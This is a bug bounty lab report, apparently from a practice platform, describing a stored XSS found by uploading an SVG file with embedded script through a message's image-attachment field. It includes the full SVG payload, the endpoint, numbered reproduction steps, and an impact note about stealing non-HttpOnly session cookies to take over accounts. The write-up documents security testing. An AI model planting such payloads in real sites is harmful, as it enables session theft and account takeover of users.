bugbountyhunter scope BARKER：第八滴血存储型 Storage Cross-Site Scripting XSS 留言处SVG文件上传报告

一次保护十个 / 2024-08-11 / 原文

登录后来到home页面，留言中存在一个Attach image

检查 xss payload：https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files

使用SVG进行图片上传，发现SVG文件上传成功并返回图片地址

poc:https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg

英哥历史报告

l have discovered a Storage XSS vulnerability affecting the endpoint 'https://cfceb12f2bfd-sec875.a.barker-social.com/post' in the parameter 'post_image'. The payloed requires no filter bypass and is a simple, ' <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg> '

You can see a working proof of concept here:

https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)

To reproduce:
1.After logging in, you will come to the home page. There is an Attach image in the message.

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367398/cajsidqey3up2g6ke99v.png)

2.Check xss payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367471/ayhhkvw7ugkx5eossb04.png)

3.Use SVG to upload pictures. It is found that the SVG file is uploaded successfully and the picture address is returned.

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367855/mmvkxsjmpd3ktefnsvae.png)

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367534/t4d7fegeelnyhl9bgacj.png)

4.You will observe xss executes

https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)

Payload used: 

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

Vulnerable parameter: post_image
Endpoint/URL: https://cfceb12f2bfd-sec875.a.barker-social.com/post

lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.